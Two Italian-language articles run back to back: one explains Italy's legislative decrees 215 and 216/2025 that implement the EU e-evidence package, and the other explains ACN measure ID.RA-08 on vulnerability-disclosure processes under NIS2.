E-evidence, l’Italia chiude il cerchio: cosa cambia davvero con i d.lgs. 215 e 216 del 2025
Con i decreti legislativi 30 dicembre 2025, n. 215 e n. 216, pubblicati nella Gazzetta Ufficiale n. 11 del 15 gennaio 2026, l’Italia ha imboccato il tratto finale di attuazione del pacchetto europeo sulle prove elettroniche (E-evidence). Due testi, due tempi, un unico obiettivo: rendere operativo sul territorio nazionale un modello di acquisizione transfrontaliera dei dati digitali che, dal 18 agosto 2026, cambierà in modo strutturale il rapporto fra autorità giudiziarie, prestatori di servizi e cittadini. Il 7 aprile 2026, a poche settimane dall’operatività, l’Ufficio del Massimario della Corte di Cassazione ha pubblicato la Relazione n. 25/2026, a firma della dott.ssa Caterina Brignone, che offre la prima lettura sistematica del quadro attuativo nazionale.
La posta in gioco si misura con un dato ricorrente nei documenti della Commissione europea: circa l’85% delle indagini penali nell’Unione coinvolge prove elettroniche, e in una quota significativa dei casi quei dati sono conservati in uno Stato diverso da quello in cui il reato è stato commesso. Fino a ieri, per raggiungerli, le procure dovevano attivare canali di assistenza giudiziaria lenti e spesso scoordinati. L’e-evidence package nasce per scardinare questa asimmetria fra la velocità del dato e la lentezza del diritto.
Due pilastri europei, scadenze a incastro
Il pacchetto si compone del regolamento (UE) 2023/1543 e della direttiva (UE) 2023/1544, entrambi del 12 luglio 2023 e pubblicati nella Gazzetta Ufficiale dell’Unione il 28 luglio dello stesso anno. La scelta di procedere con un doppio strumento riflette una divisione del lavoro precisa: da un lato le regole di procedura, direttamente applicabili negli ordinamenti nazionali; dall’altro l’architettura di compliance imposta ai prestatori di servizi, che richiede interventi adattivi di ciascuno Stato membro. È un tassello di quella più ampia convergenza normativa europea in materia di sicurezza digitale in cui si inseriscono anche NIS2, DORA e CER.
Il cuore operativo del regolamento sono due strumenti giudiziari, destinati a entrare nel lessico quotidiano degli operatori: l’ordine europeo di produzione (EPOC) e l’ordine europeo di conservazione (EPOC-PR). Il primo consente all’autorità giudiziaria di uno Stato membro di richiedere direttamente al fornitore di servizi, anche se stabilito altrove nell’Unione, la trasmissione di dati elettronici già esistenti. Il secondo ha funzione preservativa: impone al provider di congelare i dati per un massimo di sessanta giorni, prorogabili di ulteriori trenta, in attesa di un successivo ordine di produzione o di una rogatoria. I tempi di risposta sono stringenti: dieci giorni in via ordinaria, otto ore nei casi di emergenza.
La direttiva, dal canto suo, costringe ogni prestatore che offre servizi nell’Unione a dotarsi di un interlocutore fisico nel territorio UE, sotto forma di stabilimento designato o di rappresentante legale. Senza questa figura, gli ordini europei non avrebbero un destinatario certo e il meccanismo si svuoterebbe di efficacia.
Le scadenze europee si muovono su due livelli da non confondere: entro il 18 febbraio 2026 gli Stati membri devono recepire la direttiva e notificare alla Commissione le disposizioni sulle sanzioni; entro il 18 agosto 2026 devono essere rese operative le designazioni da parte dei prestatori che offrono servizi nell’Unione a quella data, mentre i nuovi provider dispongono di sei mesi dall’avvio dell’attività (articolo 3, paragrafo 6 della direttiva).
La data del 18 agosto 2026 coincide, non a caso, con la data di applicazione del regolamento (articolo 34, paragrafo 2). Il regolamento, entrato in vigore il 18 agosto 2023, diventa quindi pienamente operativo tre anni dopo, in un sistema finalmente completo di destinatari.
Il doppio binario italiano: prima il “chi”, poi il “come”
La legge di delegazione europea 2024, legge 13 giugno 2025, n. 91, ha programmato l’implementazione disegnando un cronoprogramma simmetrico a quello dei due strumenti europei. Agli articoli 7 e 19 ha introdotto principi e criteri direttivi per il recepimento, rispettivamente, della direttiva e del regolamento.
Il Governo ha scelto una via a due tappe: un primo decreto, il 215/2025, orientato a rispettare la scadenza del 18 agosto 2025, data entro la quale gli Stati membri dovevano notificare alla Commissione le autorità competenti ex articolo 31 del regolamento; un secondo decreto, tuttora in iter (lo schema è stato approvato in esame preliminare dal Consiglio dei Ministri il 22 dicembre 2025), che completerà l’adeguamento dell’ordinamento interno. In parallelo, il d.lgs. 216/2025 ha recepito la direttiva, fissando sul suolo italiano il perimetro degli obblighi a carico dei prestatori.
Il d.lgs. 215/2025, a seguito della pubblicazione in Gazzetta Ufficiale del 15 gennaio 2026, è entrato in vigore il 30 gennaio 2026. La Relazione dell’Ufficio del Massimario della Cassazione articola la propria analisi in tre parti: quadro europeo della prova digitale, attuazione nazionale del pacchetto con il modello processuale degli ordini europei, ricadute organizzative e prospettive di sistema. Una lettura di riferimento, destinata a orientare la prassi nei mesi che precedono l’ingresso a regime del meccanismo, che si affianca al primo commento di Claudio De Lazzaro già circolato in dottrina.
D.lgs. 216/2025: il pre-requisito di sistema
Il primo decreto legislativo che conviene leggere, dal punto di vista dei provider, non è il 215 ma il 216. Stabilisce infatti la condizione abilitante di tutto ciò che verrà dopo: senza stabilimento designato o rappresentante legale, nessun ordine europeo potrà essere legittimamente ricevuto ed eseguito.
L’obbligo grava su una platea ampia: operatori di comunicazione elettronica, registrar di nomi di dominio, assegnatari di numerazione IP, prestatori di servizi della società dell’informazione che consentono comunicazioni fra utenti o ne conservano i dati.
In termini concreti: cloud provider, piattaforme di messaggistica, social network, servizi over-the-top, fornitori di hosting, marketplace e simili. Sono invece espressamente esclusi dall’ambito di applicazione i prestatori di servizi finanziari (banche, assicurazioni, intermediari, servizi di pagamento, consulenza sugli investimenti), che non saranno quindi chiamati a designare stabilimenti o a nominare rappresentanti ai fini del pacchetto e-evidence, e non potranno essere destinatari di EPOC o EPOC-PR. Una scelta non priva di conseguenze, che riflette la decisione del legislatore europeo di tenere il comparto finanziario al riparo da questo circuito, in attesa di strumenti dedicati.
L’autorità centrale nazionale, quella a cui i prestatori devono notificare l’avvenuta designazione, è stata individuata nel Ministero dell’interno e, in particolare, nell’organo per la sicurezza e la regolarità dei servizi di telecomunicazione di cui all’articolo 7-bis del decreto-legge 144/2005, convertito dalla legge 155/2005. La notifica va effettuata entro trenta giorni dalla designazione o nomina; i dati di contatto e la lingua accettata saranno poi pubblicati sul sito della rete giudiziaria europea in materia penale e sul portale del Ministero della giustizia. Per un approfondimento sull’articolato del decreto rinviamo al dossier del Senato sull’Atto del Governo n. 330.
Il decreto chiude il cerchio con due previsioni che meritano attenzione: la responsabilità solidale fra prestatore, stabilimento designato e rappresentante legale in caso di inottemperanza, pensata per impedire il rimpallo di responsabilità fondato sull’asserita mancanza di procedure interne adeguate; e un regime sanzionatorio speciale, regolato dall’articolo 7, che si affianca e non si sovrappone alle sanzioni penali eventualmente applicabili. Un’architettura che, sul piano della compliance, impone al prestatore di trattare la figura del rappresentante legale non come un adempimento formale, ma come nodo critico del proprio modello organizzativo.
D.lgs. 215/2025: chi emette, chi riceve, chi controlla
Il 215 è il decreto che traccia la mappa delle autorità italiane coinvolte, sia in fase attiva (emissione) sia in fase passiva (ricezione ed esecuzione di ordini provenienti da altri Stati membri). La relazione illustrativa al Senato chiarisce che si tratta di un primo step di implementazione, concepito per rispettare la scadenza di notifica alla Commissione e in attesa del decreto complementare.
La logica di fondo ricalca fedelmente la graduazione delle garanzie prevista dal regolamento, che distingue quattro categorie di dati lungo una scala di invasività crescente:
dati relativi agli abbonati (articolo 3, punto 9);
dati richiesti al solo scopo di identificare l’utente (punto 10);
dati relativi al traffico (punto 11);
dati relativi al contenuto (punto 12).
Alle prime due categorie corrispondono garanzie più snelle; alle ultime due, presidi più rigorosi. Il decreto traduce questa scala nel linguaggio del processo penale italiano. Nel corso delle indagini preliminari, per gli ordini di produzione relativi ai dati degli abbonati e di identificazione provvede il pubblico ministero; per i dati di traffico e di contenuto, il giudice per le indagini preliminari. Per l’ordine di conservazione, trattandosi di un “congelamento” preliminare e non di un’apprensione, provvede sempre il pubblico ministero in via esclusiva, qualsiasi sia la natura del dato.
Nei casi di emergenza, definiti all’articolo 3, punto 18 del regolamento come situazioni di minaccia imminente alla vita, all’integrità fisica o a un’infrastruttura critica, gli ufficiali di polizia giudiziaria possono emettere l’ordine con efficacia immediata, trasmettendolo al pubblico ministero entro quarantotto ore per la convalida, a sua volta da adottare entro le successive quarantotto ore con decreto motivato.
Per le fasi successive alle indagini preliminari, la competenza coincide con quella del giudice che procede, su richiesta del pubblico ministero, della persona offesa, dell’indagato, dell’imputato o delle parti private. Il regolamento consente infatti anche alla difesa di sollecitare l’emissione di un EPOC, aprendo uno spazio nuovo di iniziativa difensiva che, a regime, potrebbe modificare in profondità la geografia dell’acquisizione della prova digitale nel procedimento penale.
Un presidio di sistema non marginale è la clausola di inutilizzabilità sancita all’articolo 2, comma 7: i dati acquisiti con un ordine europeo di produzione emesso fuori dai casi o in mancanza delle condizioni previste dal regolamento e dal decreto non possono essere utilizzati nel procedimento.
La “procedura accelerata”: una novità senza precedenti
Uno dei profili più interessanti del 215 è l’articolo 4, che introduce una procedura accelerata destinata a operare fuori dai casi di emergenza tipici definiti dal regolamento, ma in situazioni d’urgenza che impongono comunque una decisione tempestiva. Secondo la stessa relazione illustrativa, si tratta di un modulo che non trova precedenti nella legge processuale nazionale.
Il meccanismo è quello della previa convalida: il pubblico ministero (per ottenere i dati di traffico o di contenuto) o l’ufficiale di polizia giudiziaria (per i dati degli abbonati e di identificazione) emette l’ordine, la cui efficacia è però sospesa fino alla convalida dell’autorità superiore. L’ordine è trasmesso entro ventiquattro ore dall’emissione; il giudice per le indagini preliminari (nel primo caso) o il pubblico ministero (nel secondo) decide sulla convalida entro le successive quarantotto ore.
Un’architettura che si distingue per tempistiche da quella della procedura d’emergenza, disegnata con un modulo 48+48. La base normativa si rinviene nell’articolo 4, paragrafo 1, lettera b) e paragrafo 2, lettera b) del regolamento, che lascia agli Stati margine di manovra per definire autorità e procedure in casi urgenti. L’Italia ha sfruttato questo spazio per disegnare un percorso speditivo destinato a coprire quella zona grigia in cui l’emergenza tipizzata non sussiste, ma l’attesa dei tempi ordinari rischierebbe di compromettere l’indagine.
Il decreto non trascura il profilo del coordinamento. Quando l’ordine riguarda delitti rientranti nella competenza distrettuale rafforzata (articoli 51, commi 3-bis e 3-quater, e 371-bis, comma 4-bis, c.p.p., nonché i delitti di cui all’articolo 118-bis delle norme di attuazione del codice di procedura penale), copia del certificato EPOC o EPOC-PR è trasmessa alla Procura nazionale antimafia e antiterrorismo o al Procuratore generale presso la Corte d’appello. Dove operino i meccanismi di coordinamento europeo, l’informazione è trasmessa anche al membro nazionale di Eurojust, ai sensi dell’articolo 21, paragrafo 5 del regolamento (UE) 2018/1727.
È una previsione tutt’altro che marginale. Per la prima volta, un flusso investigativo digitale così denso di dati, spesso relativi a soggetti stranieri o transnazionali, viene canalizzato fin dall’origine verso gli organi di coordinamento nazionali ed europei. Per i CISO delle aziende destinatarie di ordini, questo significa che ogni EPOC ricevuto potrebbe avere, a monte, un’operazione di respiro europeo di cui il prestatore è solo una tessera.
Fase passiva: chi riceve gli ordini stranieri
Simmetricamente, il 215 disciplina la competenza interna per la ricezione e l’esecuzione di ordini emessi da autorità di altri Stati membri. La scelta del legislatore è quella della procura distrettuale: è il procuratore della Repubblica presso il tribunale del capoluogo del distretto in cui lo stabilimento designato o il rappresentante legale sono stabiliti a ricevere le notifiche e a gestire l’esecuzione degli ordini di produzione per dati abbonati e identificativi e degli ordini di conservazione. Per gli ordini di produzione relativi a dati di traffico o di contenuto la competenza si sposta sul GIP dello stesso tribunale, coerentemente con la graduazione delle garanzie.
Quanto alla trasmissione amministrativa degli ordini e delle notifiche, l’articolo 5 individua nel Ministero della giustizia l’autorità centrale cui fare riferimento ai sensi dell’articolo 4, paragrafo 6 del regolamento.
Per gestire l’articolo 17 del regolamento, che regola i casi in cui il prestatore solleva un’obiezione motivata per contrasto con obblighi di diritto di un paese terzo, il decreto individua due percorsi alternativi di riesame: il tribunale del riesame delle misure reali se l’ordine è stato emesso o convalidato dal giudice, il GIP se è stato emesso o convalidato dal pubblico ministero.
L’onda lunga sul diritto interno: art. 132 Codice Privacy e il nuovo art. 263-bis c.p.p.
Forse il segmento più sottovalutato del 215, ma quello con l’impatto sistemico più ampio, è l’articolo 9. Qui il legislatore ha compiuto una serie di interventi di coordinamento sull’ordinamento interno, con due effetti principali.
Il primo riguarda l’articolo 132 del Codice Privacy (d.lgs. 196/2003), la disposizione cardine sulla conservazione e l’acquisizione del traffico telefonico e telematico.
Il testo viene riscritto in più punti: si introduce la possibilità di acquisire i dati di traffico anche per agevolare le ricerche di un latitante condannato con sentenza definitiva a pena non inferiore a quattro mesi, in coerenza con l’articolo 5 del regolamento; si estende il potere di ordinare la conservazione dei dati al pubblico ministero, che diventa così titolare di uno strumento “domestico” simmetrico all’EPOC-PR europeo; si uniforma la disciplina dei dati telefonici e telematici, eliminando un’asimmetria del vecchio comma 4-ter non più giustificata. Il parere del Garante Privacy del 25 settembre 2025 aveva già auspicato questo coordinamento, sottolineando la necessità di evitare fratture fra disciplina europea e disciplina domestica della data retention.
Il secondo intervento è l’introduzione di un nuovo articolo nel codice di procedura penale, il 263-bis c.p.p., che disciplina la conservazione dei dati relativi al contenuto, la categoria che l’articolo 132 del Codice Privacy, per sua vocazione, non copriva. Il pubblico ministero può ordinarne la conservazione; la polizia giudiziaria può provvedervi in via d’urgenza, con convalida successiva. Per la prima volta l’ordinamento italiano ha uno strumento nominato e disciplinato per “congelare” i contenuti delle comunicazioni in attesa dell’acquisizione vera e propria, saldando un vuoto che, nella prassi, veniva coperto con strumenti atipici e non sempre solidi in fase dibattimentale.
Che cosa devono fare, in concreto, i provider
Per i responsabili della sicurezza e i legal compliance manager delle aziende che offrono servizi in UE, il calendario si è fatto serrato. Tre sono i fronti da presidiare entro l’estate del 2026.
Il primo è organizzativo: individuare o costituire uno stabilimento designato nell’Unione (se il gruppo vi ha sede) oppure nominare un rappresentante legale. La scelta non è neutra: il rappresentante andrà dotato di poteri e risorse effettive per rispondere a ordini con scadenze di dieci giorni, o di otto ore in emergenza. Significa processi interni, playbook di risposta, SLA con il resto del gruppo, procedure di escalation.
Il secondo è tecnologico: collegarsi al sistema informatico decentrato, istituito dall’articolo 19 del regolamento, attraverso cui transiteranno in forma elettronica tutti gli ordini, i moduli EPOC ed EPOC-PR e i dati richiesti. Gli atti di esecuzione che ne definiscono le specifiche tecniche sono previsti dall’articolo 25, e l’obbligo di utilizzare il sistema decorre un anno dopo la loro adozione. I costi di integrazione gravano sui prestatori; le opportunità di rimborso previste dall’articolo 14 riguardano le spese di esecuzione, non quelle infrastrutturali, e sono subordinate alla disciplina interna dello Stato di emissione. La tempistica di otto ore per le emergenze richiede processi automatizzati di ricerca, estrazione e trasmissione dei dati, non improvvisazioni.
Il terzo è di data governance: mappare con precisione le categorie di dati detenute (abbonati, identificativi, traffico, contenuto) secondo la tassonomia dell’articolo 3 del regolamento, e garantire la capacità di rispondere selettivamente. Un’acquisizione indifferenziata esporrebbe l’azienda sia al rischio di contestazioni in sede di riesame europeo sia a profili GDPR tutt’altro che banali.
Il calendario che conta
Per orientarsi, sintetizziamo le date chiave:
15 gennaio 2026: pubblicazione in Gazzetta Ufficiale dei d.lgs. 215 e 216/2025;
30 gennaio 2026: entrata in vigore del d.lgs. 215/2025;
18 febbraio 2026: scadenza per il recepimento della direttiva 2023/1544 da parte degli Stati membri e per la notifica alla Commissione delle disposizioni sanzionatorie;
7 aprile 2026: pubblicazione della Relazione n. 25/2026 dell’Ufficio del Massimario della Corte di Cassazione;
18 agosto 2026: termine entro cui i prestatori di servizi che offrono servizi nell’Unione devono aver designato lo stabilimento o nominato il rappresentante legale, e contestuale data di applicazione del regolamento 2023/1543. Per i nuovi prestatori che iniziano a offrire servizi dopo il 18 febbraio 2026, il termine è di sei mesi dall’avvio dell’attività.
In mezzo, un secondo decreto legislativo, complementare al 215, è atteso per completare il quadro. L’Italia, a quel punto, sarà uno dei ventisette nodi attivi di un sistema di cooperazione giudiziaria che, per la prima volta, azzera le distanze fra autorità inquirente e prestatore, ovunque questo sia stabilito in Europa. Un’infrastruttura giuridica che, se funzionerà come progettata, ridefinirà in profondità il modo in cui si costruisce la prova digitale nel procedimento penale. Se non funzionerà, resterà comunque il cambiamento più ambizioso tentato dall’Unione in materia di cooperazione penale dall’ordine di indagine europeo in poi.
ID.RA-08: la misura ACN che trasforma la gestione delle vulnerabilità in un processo strutturato
ID.RA-08: la misura ACN spesso ridotta a un semplice adempimento di monitoraggio impone in realtà un sistema completo di gestione delle segnalazioni di vulnerabilità. Analisi dei cinque requisiti operativi, del raccordo con CSIRT Italia come coordinatore CVD e degli snodi di implementazione che separano la conformità formale dalla reale capacità difensiva.
Dalla buona prassi all’obbligo normativo
Per anni la ricezione di segnalazioni di vulnerabilità è stata trattata, nella grande maggioranza delle organizzazioni italiane, come un’attività accessoria: un indirizzo generico di posta, un form di contatto, talvolta nulla. Con il recepimento della direttiva NIS2 tramite il D.Lgs. 138/2024 e la successiva attività regolatoria dell’Agenzia per la Cybersicurezza Nazionale, quella stessa attività diventa un processo formalizzato, documentato e ispezionabile. Il passaggio è sancito dalla misura ID.RA-08, una delle più pragmatiche e concrete tra quelle previste dalle specifiche di base ACN per i soggetti NIS.
La formulazione è essenziale:
«Sono stabiliti processi per la ricezione, l’analisi e la risposta alle divulgazioni di vulnerabilità».
Dietro questa frase si nasconde un cambio di paradigma che coinvolge governance, procedure tecniche, responsabilità organizzative e rapporti con ricercatori esterni, fornitori e autorità.
L’origine: NIST Cybersecurity Framework 2.0
Per comprendere ID.RA-08 occorre partire dalla sua matrice internazionale. Il codice identificativo appartiene al NIST Cybersecurity Framework 2.0, pubblicato dal National Institute of Standards and Technology statunitense il 26 febbraio 2024 come NIST CSWP 29. Nel framework, la misura è collocata nella funzione Identify, categoria Risk Assessment, e costituisce una delle dieci sottocategorie che declinano la valutazione del rischio cyber.
Il testo originale in inglese recita: «Processes for receiving, analyzing, and responding to vulnerability disclosures are established». NIST, pur non fornendo prescrizioni di dettaglio, offre due esempi implementativi: la condivisione di informazioni sulle vulnerabilità con i fornitori secondo regole contrattuali definite, e l’assegnazione di responsabilità verificabili per l’elaborazione, l’analisi dell’impatto e la risposta alle divulgazioni provenienti da fornitori, clienti, partner e organismi governativi di cybersicurezza.
Vale la pena notare una peculiarità storica. La sottocategoria, formalmente nuova nella versione 2.0, incorpora i contenuti della RS.AN-05 del CSF 1.1, che stabiliva processi per ricevere, analizzare e rispondere alle vulnerabilità divulgate all’organizzazione da fonti interne ed esterne. Lo spostamento dalla funzione Response alla funzione Identify non è cosmetico: segnala il riconoscimento che la divulgazione delle vulnerabilità non è più soltanto un’attività reattiva successiva a un incidente, ma un pilastro della conoscenza continua del rischio.
Il recepimento italiano: le determinazioni ACN
In Italia, ACN ha adottato il framework NIST come riferimento tecnico per la definizione delle misure di sicurezza di base richieste dall’articolo 24 del decreto NIS. Il percorso regolatorio si è articolato in più passaggi. Con la determinazione n. 164179 del 14 aprile 2025, firmata dal Direttore Generale Bruno Frattasi ed entrata in vigore il 30 aprile 2025, l’Agenzia ha stabilito il primo corpus di obblighi proporzionati per soggetti essenziali e importanti. La successiva determinazione n. 379907/2025 ha consolidato e aggiornato l’impianto.
L’architettura prevede quattro allegati tecnici. L’Allegato 1 contiene le misure di sicurezza per i soggetti importanti, l’Allegato 2 quelle per i soggetti essenziali, con requisiti aggiuntivi per questi ultimi; gli Allegati 3 e 4 definiscono le specifiche per gli incidenti significativi di base per le due categorie. Complessivamente, i soggetti importanti devono implementare 37 misure declinate in 87 requisiti, mentre i soggetti essenziali aggiungono 6 misure e 29 requisiti ulteriori. ID.RA-08 compare in entrambi gli allegati, ma con un’asimmetria significativa: ai soggetti importanti si applicano i punti 1, 2, 3 e 4, mentre ai soggetti essenziali si applica un punto aggiuntivo, il 5, previsto esclusivamente per questa categoria.
Le misure sono sviluppate in coerenza con il Framework Nazionale Cybersecurity e Data Protection – Edizione 2025 (v2.1), pubblicato nell’aprile 2025 e realizzato dal Centro di ricerca di Cyber Intelligence and Information Security della Sapienza e dal Cybersecurity National Lab del CINI con il supporto di ACN. L’edizione 2025 aggiorna la precedente del 2019 allineando il core alla versione 2.0 del NIST CSF.
Il contenuto della misura: cinque requisiti operativi
ID.RA-08 si articola in requisiti precisi e verificabili, che la lettura degli allegati consente di ricostruire puntualmente.
Il primo requisito impone il monitoraggio sistematico dei canali di comunicazione di CSIRT Italia, oltre a quelli di eventuali +CERT e Information Sharing and Analysis Centre (ISAC) di settore, al fine di acquisire, analizzare e rispondere in modo tempestivo alle informazioni sulle vulnerabilità diffuse attraverso questi canali istituzionali. Non si tratta di una semplice iscrizione a una mailing list: il monitoraggio deve essere effettivo, strutturato e collegato a processi decisionali interni.
Il secondo requisito riguarda la risoluzione tempestiva delle vulnerabilità. Quelle identificate, comprese quelle rilevate ai sensi della misura ID.RA-01, devono essere prontamente risolte attraverso aggiornamenti di sicurezza o misure di mitigazione, ove disponibili, oppure accettando e documentando il rischio residuo in accordo al piano di trattamento del rischio informatico di cui alla misura ID.RA-06. È la chiusura del cerchio dal punto di vista tecnico: non basta ricevere l’informazione, occorre agire e lasciare traccia.
Il terzo requisito impone la formalizzazione di un piano di gestione delle vulnerabilità che comprende almeno tre componenti esplicite: le modalità per l’identificazione delle vulnerabilità di cui alla misura ID.RA-01 e la relativa pianificazione delle attività; le modalità per monitorare, ricevere, analizzare e rispondere alle informazioni sulle vulnerabilità; le procedure, i ruoli e le responsabilità per lo svolgimento di entrambe le attività. È il documento che trasforma la buona intenzione in organizzazione tangibile.
Il quarto requisito è apparentemente breve ma strategico: il piano di gestione delle vulnerabilità deve essere approvato dagli organi di amministrazione e direttivi. Il legame con l’articolo 23 del decreto NIS, che assegna a tali organi la responsabilità delle misure di gestione dei rischi, è diretto e vincolante.
Il quinto requisito, applicabile ai soli soggetti essenziali, aggiunge un’ulteriore soglia: ai fini del primo punto devono essere monitorati anche i canali dei fornitori del software ritenuto critico. Una prescrizione operativa che riconosce quanto le vulnerabilità annunciate direttamente dai vendor siano spesso più tempestive e rilevanti di quelle intermediate da terzi.
Il ruolo di CSIRT Italia come coordinatore CVD
Un elemento cruciale, spesso trascurato nelle letture affrettate di ID.RA-08, è il suo rapporto con la Coordinated Vulnerability Disclosure nazionale. Il D.Lgs. 138/2024 disciplina la divulgazione coordinata delle vulnerabilità all’articolo 16, e all’articolo 15, comma 7, lettera b), affida a CSIRT Italia la promozione di pratiche, sistemi di classificazione e tassonomie standardizzati o comuni proprio in materia di divulgazione coordinata delle vulnerabilità. CSIRT Italia opera così come coordinatore nazionale ai sensi della direttiva (UE) 2022/2555, che impone a ciascuno Stato membro di designare uno dei propri CSIRT con questo compito.
Tra i compiti assegnati, la direttiva elenca l’identificazione e il contatto dei soggetti interessati, l’assistenza alle persone fisiche o giuridiche che segnalano una vulnerabilità, la negoziazione delle tempistiche di divulgazione e la gestione di vulnerabilità che interessano più soggetti. Il CSIRT designato deve inoltre garantire l’anonimato di chi segnala, quando richiesto, e cooperare con la rete europea dei CSIRT.
CSIRT Italia ha predisposto una propria policy CVD, pubblicata sul portale istituzionale, che descrive modalità di segnalazione, canali cifrati, informazioni minime attese e principi generali di gestione. Le FAQ ufficiali raccomandano espressamente di non segnalare vulnerabilità già note a cui sia stato assegnato un identificativo CVE, e precisano che la notifica non costituisce denuncia, querela o esposto ai fini penali, per i quali restano competenti gli organi di polizia giudiziaria.
Il punto è particolarmente delicato sul versante dei ricercatori di sicurezza, che in Italia operano ancora oggi in un perimetro giuridicamente incerto, come analizzato nel nostro approfondimento sulla responsabilità penale dell’ethical hacker. Per le organizzazioni soggette a ID.RA-08, comunque, il monitoraggio dei canali CSIRT richiamato nel primo requisito non è fine a sé stesso: è parte integrante di un ecosistema nazionale in cui ricercatori di sicurezza, Product Security Incident Response Team aziendali, fornitori e autorità cooperano secondo regole definite.
Le connessioni sistemiche: ID.RA-08 non vive in isolamento
Una delle caratteristiche più interessanti del modello ACN è il tessuto di relazioni che lega le misure tra loro. ID.RA-08 è uno dei nodi centrali di questa rete.
A valle, ID.RA-08 fornisce l’input informativo per ID.RA-01, che richiede l’identificazione e la registrazione delle vulnerabilità sugli asset: il testo dell’Allegato 1 esplicita che «le informazioni di cui al punto 1 della misura ID.RA-08 sono utilizzate per identificare eventuali vulnerabilità sui sistemi informativi e di rete». A monte, ID.RA-08 richiede l’esistenza del piano di trattamento del rischio definito in ID.RA-06 per gestire formalmente i rischi residui quando una vulnerabilità non può essere sanata. Lateralmente, la misura dialoga con ID.RA-05, che usa minacce, vulnerabilità, probabilità e impatti per comprendere il rischio inerente e orientare la prioritizzazione delle risposte.
Sul versante della protezione, ID.RA-08 si collega direttamente a PR.PS-02, che impone l’installazione tempestiva degli aggiornamenti di sicurezza rilasciati dal produttore in coerenza proprio con il piano di gestione delle vulnerabilità. E nella funzione Improve, la misura dialoga con ID.IM-04, relativo alla definizione e al miglioramento dei piani di risposta agli incidenti e degli altri piani di cybersecurity che impattano le operazioni.
In sintesi: ID.RA-08 è il motore informativo che mette in moto buona parte del ciclo di vita della gestione delle vulnerabilità previsto dalle specifiche ACN.
La dimensione europea: ENISA, EUVD e Cyber Resilience Act
Nessuna analisi di ID.RA-08 può prescindere dal contesto europeo. La direttiva NIS2 ha affidato a ENISA il compito di sviluppare e mantenere un European Vulnerability Database, consultabile da organizzazioni e fornitori su base volontaria. ENISA è stata autorizzata come CNA a gennaio 2024, ruolo che le permette di assegnare identificativi CVE alle vulnerabilità scoperte dai CSIRT europei o segnalate loro per coordinated disclosure, e il database EUVD è stato lanciato ufficialmente il 13 maggio 2025. Successivamente l’Agenzia è stata riconosciuta come CVE Program Root, rafforzando ulteriormente il suo ruolo nell’ecosistema globale delle vulnerabilità.
Questa architettura europea si intreccerà progressivamente con il Cyber Resilience Act, entrato in vigore il 10 dicembre 2024. A partire dal settembre 2026 diventerà operativa l’obbligatorietà, per i produttori di prodotti con elementi digitali, di notificare le vulnerabilità attivamente sfruttate attraverso la Single Reporting Platform gestita da ENISA, che inoltrerà le informazioni ai CSIRT designati degli Stati in cui il prodotto è stato messo a disposizione. Gli obblighi principali del CRA si applicheranno dall’11 dicembre 2027. Per le imprese italiane, CSIRT Italia rappresenterà il punto di contatto operativo.
L’implicazione per l’attuazione di ID.RA-08 è diretta: il processo interno di gestione delle divulgazioni dovrà essere progettato pensando a un’interazione multilivello, con canali nazionali, europei e, per chi sviluppa prodotti, obblighi di notifica verticali verso ENISA.
Tempistiche di adeguamento e conseguenze della compliance
Il calendario fissato da ACN prevede che i soggetti NIS dispongano di diciotto mesi dalla ricezione della comunicazione di inserimento nell’elenco nazionale per adottare le misure di sicurezza di base, e di nove mesi per rendere operativa la capacità di notifica degli incidenti. Per la coorte registrata nell’aprile 2025, l’adeguamento completo alle misure, ID.RA-08 inclusa, deve essere completato entro ottobre 2026.
L’orizzonte temporale è ravvicinato e le verifiche non tarderanno. Il decreto NIS attribuisce ad ACN poteri ispettivi e sanzionatori significativi: per i soggetti essenziali, escluse le pubbliche amministrazioni, le sanzioni pecuniarie possono raggiungere 10 milioni di euro o il 2% del fatturato annuo mondiale dell’esercizio precedente, se superiore; per i soggetti importanti, sempre escluse le PA, la soglia è di 7 milioni o l’1,4% del fatturato.
Sono previste inoltre sanzioni accessorie, tra cui l’incapacità temporanea a svolgere funzioni dirigenziali per i responsabili di violazioni gravi o reiterate. Dimostrare la conformità a ID.RA-08 significa poter esibire, in sede di audit, documentazione del piano di gestione delle vulnerabilità, evidenze del monitoraggio dei canali CSIRT, registri delle segnalazioni ricevute, traccia delle decisioni di patching o di accettazione del rischio, e prova dell’approvazione formale del piano da parte degli organi di amministrazione e direttivi.
Che cosa significa, concretamente, implementare ID.RA-08
Tradurre la misura in prassi operativa richiede almeno sei componenti.
Il primo è un canale ufficiale di ricezione, tipicamente una security.txt conforme a RFC 9116, un indirizzo di posta dedicato e monitorato, e, per le organizzazioni più mature, una chiave PGP pubblica per comunicazioni cifrate. Il secondo è una policy pubblica di CVD, che definisca aspettative reciproche, tempistiche indicative di triage e remediation, ambito dei sistemi coperti e porto sicuro per i ricercatori che agiscono in buona fede. Il terzo è un processo interno di triage con ruoli e responsabilità documentati, spesso incardinato sul Security Operations Center o su un Product Security Incident Response Team quando l’organizzazione sviluppa propri prodotti.
Il quarto è l’integrazione con il vulnerability management esistente: ogni segnalazione ricevuta deve confluire nel workflow di identificazione ID.RA-01 e, se pertinente, nel piano di trattamento ID.RA-06. Il quinto è la gestione documentata delle accettazioni di rischio per i casi in cui una vulnerabilità non possa essere sanata tempestivamente, con approvazione formale da parte degli organi decisionali e misure di mitigazione compensative. Il sesto, spesso sottovalutato, è la comunicazione strutturata con il segnalante, che costituisce al tempo stesso un obbligo etico e un fattore di reputazione.
Oltre la compliance: una cultura della divulgazione
Sarebbe riduttivo leggere ID.RA-08 come un mero adempimento burocratico. La misura codifica un principio che la comunità internazionale di sicurezza ha maturato in decenni di esperienza: la divulgazione responsabile delle vulnerabilità è un bene comune. Ogni segnalazione accolta, analizzata e risolta è un attacco evitato, per l’organizzazione stessa e per chiunque utilizzi prodotti, servizi o infrastrutture simili.
Il quadro ACN, combinato con il coordinamento di CSIRT Italia e con l’infrastruttura ENISA, offre alle organizzazioni italiane un’occasione concreta: trasformare un obbligo in capacità, e una capacità in postura. Nel momento in cui le segnalazioni diventano parte del linguaggio quotidiano tra aziende, ricercatori e autorità, la superficie d’attacco del Paese si riduce non perché le vulnerabilità diminuiscono, ma perché il tempo medio tra scoperta e rimedio si accorcia.
In un panorama in cui, come rilevato da CSIRT Italia in un bollettino pubblicato nell’aprile 2026, il gruppo ransomware AKIRA ha colpito dall’inizio dell’anno tredici imprese italiane, con target prevalentemente tra le piccole e medie imprese e attraverso lo sfruttamento sistematico di vulnerabilità n-day non patchate su dispositivi perimetrali, l’efficacia di ID.RA-08 non è una questione teorica. È, molto semplicemente, la differenza tra una rete che resiste e una rete che cede.
